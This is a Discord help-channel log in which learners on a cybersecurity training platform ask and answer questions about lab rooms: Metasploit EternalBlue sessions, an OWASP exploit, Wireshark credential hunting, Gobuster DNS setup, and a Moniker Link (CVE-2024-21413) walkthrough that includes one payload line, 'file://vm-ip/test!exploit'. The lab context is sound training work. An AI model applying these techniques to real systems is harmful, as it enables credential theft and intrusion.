that it doesn't work

tulip linden
junior ingot
tulip linden
junior ingot
# tulip linden No.

damn, i'm so stupid it was right in front of me... thanks, i readed the question 3times before understanding lol

olive fogBOT
#

Gave +1 Rep to @tulip linden (current: #2 - 3794)

junior ingot
#

Thanks

weary quarry
#

Is there any really easy room we could use to practice 101 stuff? that would be cool.

boreal summit
#

hey i need some help . where i can share error img ? room : Moniker Link (CVE-2024-21413)

urban zephyr
magic rapidsBOT
boreal summit
boreal summit
urban zephyr
#

then give it time to update, it might take a day

boreal summit
#

oh

#

oky

#

can you help me for that error ? dm ?

storm sigil
magic rapidsBOT
storm sigil
#

@boreal summit

boreal summit
#

/verify

boreal summit
#

__

humble creek
#

Hi I’m starting my journey into cybersecurity and admire yall background. I’m looking for guidance from someone experienced. Would you be open to a quick chat or offering advice occasionally? Totally understand if you’re busy.

woeful jungle
humble creek
#

Thank you so much.

silver pollen
#

OWASP Top 10 - 2021 Task 15
What is the content of the /opt/flag.txt file?

I get flag but i wonder why python2 dont work but python3 does. In task 14 python2 was shown thats why im curious. Next thing is i found exploit online but a bit by accident. I found a message on discord that says that the header and footer should be "online book store v1.0" but when I use the inspect option I don't see anything like that.

wraith marsh
#

Looking at the exploit its definitely been written for python3 since the room was created a few years ago its possible that the exploit used has been updated since python2 is no longer with us (RIP)

#

Although the header on it is dated 2020 and V1.0 so your guess is as good as mine πŸ˜‚

silver pollen
silver pollen
#

and modified it with nano, added url inside script

silver pollen
wraith marsh
#

Seems ok for me

python --version                       
Python 3.13.3
silver pollen
#

i think @wraith marsh is right ;p

#

im not getting rce after confirming it with "y"

#

im on attack box if it's important

woeful jungle
wraith marsh
#

I used my own box, but I don't see why the attackbox would be any different

wraith marsh
silver pollen
#

ok, at least im a little bit smarter now and know i should use python3 πŸ˜† but still im not sure how would i find this exploit if not @woeful jungle comment from other chat on this discord

#

like im inspecting page and can't see anything about "online book store v 1.0"

silver pollen
wraith marsh
#

site:exploit-db.com <search term> on Google πŸ™‚

silver pollen
#

i started with looking for cse bookstore and that was my first mistake here

wraith marsh
#

Mistakes are just a precursor to learning

silver pollen
#

ye i know, but im still not sure if i would be able to find it without discord

limber radish
#

I'm on the Windows PowerShell room. I've got to task 7 and I need to give the property which is retrieved by default by the Get-NetTCPConnection command. However, I only get 3 properties returned and none of these are the answer. I know what the answer is now as I've searched the web for it. But why is it not showing by 'default'?

woeful jungle
woeful jungle
limber radish
woeful jungle
limber radish
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5145)

shrewd temple
#

heloo everyone

limber radish
#

Networking Secure Protocols

Task 8. Using WireShark I need to find the packet which contains login credentials. However, there are 468 of them. How do I filter these down to find the one I'm after? The hint does say which one, but how do I get to that answer without it being handed to me?

limber radish
# woeful jungle Follow streams

I dont understand wym by this. Also I have got the wireshark basics room coming up next, hopefully this clears some things up, but using it in the previous room was quite a leap compared to what I'm used to so far with THM

woeful jungle
limber radish
woeful jungle
limber radish
# woeful jungle Maybe this article can help <https://www.wireshark.org/docs/wsug_html_chunked/Ch...

This only allows me to view what was sent between the client and the server, relating to that specific packet. Which does show the login credentials but only if I know what packet to check. My problem was finding which packet, out of the 468, was the one containing the login credentials.
For example if I follow the http stream of packet 30. It does not show the login credentials as they are not contained in this specific stream. So my problem is how do I find http stream containing the login credentials without checking each individual packet manually nor by using the hint? Or are hints necessary in these cases?

woeful jungle
limber radish
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5161)

weary quarry
#

The metasploit section is awesome ! the second module and the fact you guys don't give it easely makes it really fun

#

and actually makes us learn the tool not just copy paste theory

#

Im just missing a bit a knowledge on how to scan for vulnerabilities for effectively πŸ˜›

late quarry
weary quarry
narrow dock
#

Could Someone Help
Room : Gobuster : Basics
I Am trying to restart /etc/init.d/dnsmasq
but no such file exists on my kali vm

woeful jungle
narrow dock
#

using the correct command

#

and everything

#

changed the /etc/hosts

#

and added ip_address www.offensivetools.thm

fervent elm
weary quarry
#

I have a question. Msfvenom is basically for when we want to create a payload that is in a certain format that we can deliver to a target machine to achieve for example a reverse shell.
But sometimes we are able to exploit a machine without having to deliver these payloads.
In real life when do we choose to use Msfvenom vs a direct exploit module?

Im sorry if my question sounds confusing.

woeful jungle
static fable
#

I’m so excited. I’m 88% done with cybersecurity 101. Five more rooms.

woeful jungle
narrow dock
#

anyways thanks

#

used the AttackBox

woeful jungle
fallow flare
#

Anyone around to provide some assistance with Windows Powershell Task 7 Question 3? I could do this with a powershell script using WMI, but the module hasn't taught WMI. I'm trying to figure out the intended process for finding this answer.

fallow flare
# fervent elm Use the `get-service` command

yes.. I've done this. i've found the service name and display name, but i can't seem to tie those fields to a process ID without the use of WMI. google searches on the subject are also only showing the use of wmi. All examples I see of referencing a service by it's .Id attribute have failed.

prime fern
fallow flare
woeful jungle
limber radish
#

Moniker Link (CVE-2024-21413)

I need to send an email containing a Moniker link via a python script. I have copied the script and changed what's needed. I am getting an "Email delivered" confirmation message after running the script. However, when switching to the vulnerable machine, it doesn't seem to recieve any email. Kinda stumped on what to try here

woeful jungle
limber radish
#

I get these errors

#

That's before I even send the email though, that's just when I start responder

woeful jungle
limber radish
woeful jungle
limber radish
#

Changed the receiver_email and server variables to include the IPs which the room stated. I did try changing the sender_email too. But that resulted in authentication errors when inputting the password

woeful jungle
#

Change that

#

Also don't touch receiver_email

#

Restart the machine and start with a fresh script

limber radish
#

Now it's working thanks.

The line "Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our AttackBox" is misleading as that's what caused me to change receiver_email initially

woeful jungle
limber radish
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5199)

silk sage
#

yo

#

on the Wireshark: The Basics

#

task 5

#

Use the "Exercise.pcapng" file to answer the questions.
Go to packet number 4. Right-click on the "Hypertext Transfer Protocol" and apply it as a filter.
Now, look at the filter pane. What is the filter query?

#

1089

#

that's the answer

#

but its saying its wrong...

#

can anyone look into it

#

@woeful jungle would you beable to help me?

woeful jungle
magic rapidsBOT
#

I could not find an article, please try again.

silk sage
#

yes ill averify

#

gimmie one sek πŸ™‚

#

okay done

#

πŸ™‚

#

there you go

#

@woeful jungle any luck πŸ™‚

woeful jungle
# silk sage

Well you can see filter in the filter above πŸ™‚

#

It's http

#

You're filtering only for http traffic

silk sage
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5206)

silk sage
#

its late T^T

#

thank you again KGB

flint peak
#

on blue, i'm using the post/multi/manage/shell_to_meterpreter with correct lhost and session, but when i try to sessions -i 1 after successfully running the exploit, i still have the normal shell?

#

tried sessions -u 1 too!

woeful jungle
#

and provide a shot

flint peak
#

thanks

olive fogBOT
#

Gave 1 Rep to kgbkp (current: #1 - 5207)

tender adder
#

Hello, i am finishing cyber-security 101 and did not think to take notes of the rooms...
Any resources with it or places i can look for them?
thanks

gray wren
#

I am unable to terminate the session which was expired as I was idle for too long. can someone help pls? - Room: Nmap: The Basics

tender adder
left escarp
#

hi, anyone can help me with the task 8 from room John the Ripper: The Basics, i didn't found the resolutions ---> What rule would we use to add all capital letters to the end of the word?

left escarp
# woeful jungle What's your answer ?

Where do I find the field in john.conf that I can change to make the last character uppercase? I have looked through the entire file and didn't find it, the answer requires that I respond with the name of the rule.

woeful jungle
left escarp
#

it's ok, but the question is: "What rule would we use to add all capital letters to the end of the word?"

scarlet wedge
left escarp
scarlet wedge
left escarp
#

kkk omg, my answer --> uppercase

left escarp
#

thanks guys, now i undestand, sorry, the answer for this questions is a sintaxe for generate the rule

knotty void
#

Hi guys, anyone knows why I am able to edit everyone's passwords and open AD with Phillip's account in Active Directory Basics Task 4?

woeful jungle
knotty void
#

On the left I am, but on the right I logged in as Philip

woeful jungle
knotty void
#

Yes, but only to Sales OU

cedar oasis
#

Hi everyone I just joined cybersecurity 101

woeful jungle
fallow flare
#

Can someone help me understand why I'm getting a syntax error with tcpdump when trying to filter only on the ICMP packets?

I've tried referencing the man page and other messages regarding task 4. I can get it to work if sniffing the iface, but cant get it to work using the pcap file provided.

#

nvm.... figured it out

rigid arrow
#

task 4: "What was the flag found on Sophie's desktop?"

How do i switch users or access sophies desktop? Feeling dumb..

woeful jungle
rigid arrow
#

connected via RDP, got it working! thanks!

woeful jungle
lucid cedar
#

Hi everyone, I am having problem with one of the tasks (Task 3-exploitation) of the room "Moniker Link (CVE-2024-21413)". The task involves a walkthrough of mimicking an exploitation to retrieve NTLM hashes via outlook email. I do get the email in the outlook inbox of target machine, but when I click the malicious link, I get this warning message and I don't get any NTLM hash in SMB responder terminal. For context, I followed the instruction of changing IP address of the attackbox on the python script I am supposed to run to emulate the attack. I would really appreciate if someone can point out what I am doing wrong. Thanks πŸ™‚

woeful jungle
lucid cedar
woeful jungle
lucid cedar
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5284)

quaint swift
#

Dear THM users!πŸ˜‡

Got a bit stuck with the "Active Directory Basics" room - https://tryhackme.com/room/winadbasics
Module - "Managing Users in AD".

Summary:
How can I log in as "phillip"? πŸ€”

Details:
After Delegating password reset rights to philip the module asks me to log in as philip and reset another user's password.
The problem is that there is already one windows machine running in the split view and I don't see any option to run another one or sign out on this one and log in back as Phillip.
It mentions RDP but unfortunately VPN connection doesn't work for me for some reason.
Or am I missing something entirely in this task?πŸ€”

P.S. Also how do you attach screenshots here?πŸ‘€

woeful jungle
quaint swift
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5292)

woeful jungle
cedar oasis
silver echo
#

I finished pre security and started with Cyber security 101

#

Next plan is

Jr PT 1 and Red team path

woeful jungle
fallow flare
#

I'm also having some issues with task 3 of the Moniker link exploitation task.
After copying over the poc code and changing line 12 and 31 and running the script, the email never sends for me.

I have set line 12 to be my kali VM ip (i restarted my thm vpn connection to be sure)
I have set line 31 to be the IP of the vm started from the module and is shown in the task instructions.

fervent crow
#

Need help

cedar oasis
silver echo
#

Thank you πŸ™

cedar oasis
silver echo
#

9 days of hard work , now I am in the top 9 percent πŸ™ŒπŸ™Œ

cedar oasis
#

Always remember consistency is key!

woeful jungle
woeful jungle
fallow flare
#

that line has <p><a href="file://vm-ip/test!exploit">Click me</a></a>

woeful jungle
# fallow flare

Can you try to do it on AttackBox , maybe you have some kind of VPN connection problem ?

manic minnow
#

Hi all,
I'm in Cyber Security Learning Roadmap/freeroadmap/networkservices and I'm having a problem with exploitiong smb
on the issue :Great! Please take a look at the interesting documents that might contain valuable information. Who can we assume this profile file belongs to?
knowing that I've found the end flag.
I'm looking for a clue or indication to allow it to 100% validate this module.
Thanks in advance

woeful jungle
magic rapidsBOT
manic minnow
woeful jungle
magic rapidsBOT
manic minnow
woeful jungle
magic rapidsBOT
manic minnow
#

Ok Thk

limber radish
#

I need help in the Gobuster room.

The room says this:
Important: We work in a local network with a DNS server on the web server. To ensure we can resolve the domains used throughout this room, you need to change the /etc/resolv-dnsmasq file:

Unsure how to set this up inside a kali linux vm. I tried reading back on the support given to others but still can't fully understand what to do. Here is my /etc/hosts file which I have edited.

limber radish
#

Think I have it working. Changed the file to this

woeful jungle
# limber radish

Change nameserver to an actual domain and subdomain of your app

limber radish
#

I do when enumerating vhosts though...

fallow flare
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5313)

woeful jungle
limber radish
woeful jungle
woeful jungle
limber radish
fallow flare
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5314)

fallow flare
manic minnow
#

@woeful jungle I've found the answer!

limber radish
#

Not sure if this is to do with my /etc/hosts file

woeful jungle
limber radish
woeful jungle
jovial veldt
#

I need help in Linux programming room

woeful jungle
limber radish
woeful jungle
limber radish
#

So I need to include both. Like this.

10.10.201.22    www.offensivetools.thm```
?
jovial veldt
woeful jungle
jovial veldt
#

I did that

woeful jungle
magic rapidsBOT
limber radish
# woeful jungle Yeah

Still not showing new results. I saw a walkthrough and they had 5 results show up. They were using the attackbox, but I'd rather do it via my own VM

woeful jungle
jovial veldt
#

I opened the target machine and attack box connected to the target machine using ssh then searched using ls but didn't find those directories

limber radish
woeful jungle
# jovial veldt .

Verify following the instructions from above and provide some screenshots so we can see what's going on

limber radish
woeful jungle
#

it will tell gobuster which server to use as a DNS server

limber radish
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5316)

jovial veldt
woeful jungle
supple trail
#

Good Evening guys, a little stuck here on one of the question in the Windows Powershell room.

Under Task 7, the second question asks:
What property retrieved by default by Get-NetTCPConnection contains information about the process that has started the connection?

I'm not quite sure what it's asking for even after running the command on the remote machine...

forest quest
#

Cant phrase it too much diffrent or id give away the answer

lucid cedar
#

I have a question about Blue room (https://tryhackme.com/room/blue) Task 5-Find Flags!. For flag3, it asks us to look in the admin account. But when we are in C:\Users, there is no admin account name or any indication who is the admin user (there is default user, jon, and public). I got the flag3 luckily by looking through user Jon, but my question is how do we know Jon is the administrator? Is there some information that I missed in previous rooms to determine the admin user account?

TryHackMe

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

woeful jungle
blazing zenith
#

has anyone encounter a problem with the windows powershell room? im trying to do the "Real-time system analysis" chapter but i have a problem with the Hash

lucid cedar
wind imp
#

I'm trying to find the packet whch holds the credentials. But the roadmap hasnt introduced me to Wireshark yet. Any hint, how can I filter the packets. I know it should be a post HTTP request.

woeful jungle
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5330)

tawdry ember
cunning pollen
#

Hii m new here

woeful jungle
blazing zenith
#

@woeful jungle after some trial and error, I managed to finish the room, the instructions said to look for the hash number in the file of the exercise but it wasnt very clear which one we had to look for. At first i assumed we had to get the hash number of the file in the current exercise but it ended up being the hash for the previous room.

gray nimbus
#

hi i am stuck here Windows Fundamentals 1 on task 6 What is the account description? for the guest account the description is Built-in account for guest access to the computer/domain i cannot find the answer

gritty wave
#

Hi! im new here and new on this discovery of cyber security . please guide me where to start and what's first to learn to ace it.

woeful jungle
jovial veldt
#

hi i am stuck here Windows Fundamentals 1 on task 8, in the control panel change the view to small icons. What is the last setting in the control panel view? I can change the view to small icons by view by but am not able to find the last setting

woeful jungle
magic rapidsBOT
jovial veldt
#

The uploader option (+) next to my type bar is greyed out so I can't share the screenshot

jovial veldt
woeful jungle
jovial veldt
#

/verify

#

here i can change the view to small icons but where are the last settings

woeful jungle
jovial veldt
#

Okk found it

#

I thought I need to specify the settings that were applied before applying small icons

jovial veldt
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5340)

jolly idol
#

hey, i just solved the burpsuite basics room. there's one task where you have to visit a secret endpoint to get the flag. the endpoint is in a js file, and it fetches that path, so if i visit the path where this js file is loaded then that request will show up in my proxy tab.
I was looking for a way to automate this. Are there any tools that does this type of crawling? like instead of manually visiting every endpoint, we just give it a website url, and it should crawl every url recursively. The output should also included paths like this that are fetched using javascript.
I was thinking about using a headless browser to build this tool, so that i can take paths from every request that comes under the request tab, is it possible?
I also tried katana in headless mode and js crawling enabled, but that doesn't seem to work as well.

woeful jungle
#

Option is called Spider in ZAP

jolly idol
woeful jungle
jovial veldt
#

i am on active directory basics task 6 can anyone tell me where i am going wrong as i am not able to see the same content as the picture

woeful jungle
tawdry dome
#

hi guys im new here i need hackers and spammer friends sendme a PM

blazing zenith
#

Hello, im having troubles completing the "networking secure protocols" ive found the flag for the last challenge but the password they are requiring is 2 characters shorter than the one I found. Has anyone encounter this?

blazing zenith
woeful jungle
blazing zenith
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5346)

blazing zenith
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5347)

reef lake
#

hello i have problem in Networking Core protocol task 4 ? can you help me

woeful jungle
#

GET /flag.html HTTP/1.1 Host: telnet

#

Hit enter twice to send a request

pulsar quartz
#

I did this yesterday only, wasn't working when I wrote HTTP/1.1

#

just GET /flag.html and hit enter

reef lake
#

thz i got it

cunning pollen
#

Is the server is still down

#

I cant use any machine

woeful jungle
gentle flare
#

Hello

#

silly question maybe, Network Core Protols task 4

#

no IP here

woeful jungle
fervent elm
#

The example in task5 uses eternalblue. So, that was a bit of a give-away. Anyway, it's also about cultivating the mind-set of a hacker. You need to be persistent. If one exploit/method doesn't work you try another 🀷

wise pilot
#

Hi, guys
What challenges or other methods where I can practice what I've learnt in "Intro to Malware Analysis" room? Like, it looks A bit like a Reverse Engineering case, but I might be wrong πŸ™‚ Any hints, please?

spiral lance
#

probably a ram issue

cedar oasis
near sparrow
#

Hi, everyone. How are you?

#

Can any one help me?

#

How I can use remote desktop at windows fundamentals 1 room ?

woeful jungle
near sparrow
#

Okay 😊

#

Thank you, KGB.

tall grove
#

In the Gobuster room it asks me to make a change to resolv-dnsmasq file but when restarting after changes its been failing repeatedly.

#

Could i get some help on that?

woeful jungle
tall grove
olive fogBOT
#

Gave +1 Rep to @woeful jungle (current: #1 - 5372)

nova saffron
#

Hello, I am doing this learning path and i am on the powershell module, when i follow all the steps to SSH into Remina and use the log ins ven with the IP they gave me, i cant seem to get to the Powershell CLI, it just ssh into the windows one and i cant run any PS commands

wind imp
#

I'm trying to export packet bytes in wireshark....but the save button is disabled...is there a reason for that?

wind imp
near sparrow
#

Hi everyone, how I can use power shell windows in an Active directory basics rooms

near sparrow
#

No problem, my problem have been solved.

willow nimbus
#

Hey I want to start please guide me

woeful jungle
willow nimbus
#

Ok thanks

pale swift
#

OK, I'm kind of feeling stupid atm. Is it me, or does the Metasploit module move pretty quick? It says 20 min and I've been having a lot of trouble with it..not really understanding all what they're wanting me to do, or what they're having me do is actually doing..

#

I'm on the Msfvenom part, and staring at my screen like "what did they just do?" lol

woeful jungle
pale swift
#

The estimated time? It definitely seems so in this case lol

#

I've been on this for hours πŸ˜„

woeful jungle
# pale swift I've been on this for hours πŸ˜„

That's perfectly fine . Take your time and go slowly , many things won't make much sense in the beginning so it is normal that it looks a bit confusing . Just don't rush and ignore that time feature please πŸ™‚

pale swift
#

That's fair. This section seems exceptionally challenging. I'm not even sure what we did in the example (in fact I'm not even sure I did it right there, as I never seemed to have got a console), and now I have to put it into practice in another way to advance

#

Been loving this until this damn room haha

woeful jungle
pale swift
#

lol

#

I hope so, because right now I'm ready throw my keyboard across the room 🀣

#

May be better to come back to it tomorrow πŸ˜„

woeful jungle
latent zephyr
#

umm anyone there i am having a problem in metasploit exploitation task 5

#

like its about ms17, when i exploit it it is giving back and back same thing exploit completed but no session was created

#

where i am trying to create a meterpreter's session

woeful jungle
latent zephyr
#

umm like

#

i want to get the flag file from target machine which is vurnable to ms17

#

so i am using eternalblue one

#

this one

woeful jungle
latent zephyr
#

i did

woeful jungle
latent zephyr
#

this i am taking again retrying

#

wait let me show

#

after this i need to directly run right?

fervent elm
woeful jungle
latent zephyr
#

Oooo

woeful jungle
#

ip a and find tun0 interface

latent zephyr
#

oops

#

sorry i got it

#

Thanks a lott

#

got my flag thanks a lott😁

dark ridge
#

Hello

worthy sparrow
#

hello

dark ridge
#

Good morning

gentle flare
#

Hello. Ran into a bit of difficulty on Metasploit exploitation.

#

I have 3 boxes set up - Target, my own and MSConsole

#

believe i configured everything correctly, however when i run the shell on the target machine, im not getting a meterpreter session open

#

Top left Target, bottom msfcons top right attack

woeful jungle
# gentle flare

You should download the payload on the machine provided in the task

gentle flare
#

the target machine?

woeful jungle
gentle flare
#

thought thats what i have done

woeful jungle
gentle flare
#

top left it target machine

#

attack box top right

woeful jungle
gentle flare
#

yah

#

chmod

#

its like it frozen on the mfscon - i have started again

#

perms